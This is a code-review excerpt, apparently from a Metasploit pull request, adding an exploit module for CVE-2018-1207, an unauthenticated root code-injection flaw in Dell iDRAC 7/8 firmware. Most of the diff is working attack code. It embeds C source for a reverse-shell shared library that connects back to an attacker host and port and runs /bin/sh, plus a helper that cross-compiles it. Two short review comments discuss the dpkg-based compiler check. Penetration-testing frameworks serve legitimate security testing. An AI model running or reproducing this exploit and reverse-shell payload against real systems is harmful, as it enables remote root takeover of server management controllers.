modules/exploits/linux/http/dell_idrac_upload_exec.rb

```diff
@@ -0,0 +1,192 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Dell iDRAC 7/8 Devices Code Injection Vulnerability (RCE)',
+      'Description' => %q(
+        CVE-2018-1207. Vulnerable version firmware: <  2.52.52.52. Unauthenticated remote code execution
+        against Dell iDRAC 7 and 8, which runs as root.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Wyatt Dahlenburg (@wdahlenb)',
+          'Starev Alexey ( https://t.me/starev_aa ), http://kraud.ru'
+        ],
+      'DisclosureDate' => '2018-09-06',
+      'Platform' => 'linux',
+      'DefaultOptions' => { 'Payload' => 'generic/shell_reverse_tcp' },
+      'SessionTypes' => [ 'shell' ],
+      'Targets' => [['Auto', {}]],
+      'References' =>
+        [
+          ['URL', 'https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1207'],
+          ['CVE', '2018-1207']
+        ],
+      'DefaultTarget' => 0))
+    register_options [
+      OptInt.new("TIMEOUT", [false, 'Override default timeout for reqeusts', 15]),
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+    ]
+  end
+
+  def write_payload(file, lhost, lport)
+    vprint_status "Writing #{file.path}"
+    data = <<~EOF
+      #include <stdlib.h>
+      #include <unistd.h>
+      #include <sys/socket.h>
+      #include <netinet/in.h>
+      #include <arpa/inet.h>
+      #include <unistd.h>
+      static void main(void) __attribute__((constructor));
+      static void main(void)
+      {
+        int pid = fork();
+        if(!pid) {
+          int sock = socket(AF_INET, SOCK_STREAM, 0);
+          struct sockaddr_in serv_addr = {0};
+          serv_addr.sin_family = AF_INET;
+          serv_addr.sin_port = htons(#{lport});
+          serv_addr.sin_addr.s_addr = inet_addr("#{lhost}");
+          connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
+          dup2(sock, 0);
+          dup2(sock, 1);
+          dup2(sock, 2);
+          execl("/bin/sh", "/bin/sh", NULL);
+        }
+      }
+    EOF
+    file.puts data
+  end
+
+  def compile(source_path, payload_path, gcc_args = '')
+    gcc_cmd = "sh4-linux-gnu-gcc-8 -shared -fPIC #{source_path} -o #{payload_path}"
+
+    unless gcc_args.to_s.blank?
+      gcc_cmd << " #{gcc_args}"
+    end
+
+    if `dpkg --get-selections | grep ^gcc-8-sh4-linux-gnu`.blank?
```

Comment:
This doesn't seem very compatible. `dpkg` isn't going to be on every system

Reply:
@cbrnrd Do you have a reference of a good way that other exploits do this?